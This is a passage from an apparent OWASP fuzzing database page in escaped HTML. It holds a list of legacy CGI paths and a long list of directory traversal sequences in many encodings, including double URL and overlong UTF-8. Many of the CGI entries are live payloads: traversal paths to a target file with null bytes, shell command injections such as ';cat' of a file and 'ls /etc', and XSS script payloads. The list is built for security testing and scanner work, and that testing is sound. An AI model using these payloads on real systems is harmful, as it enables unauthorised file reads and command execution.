talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
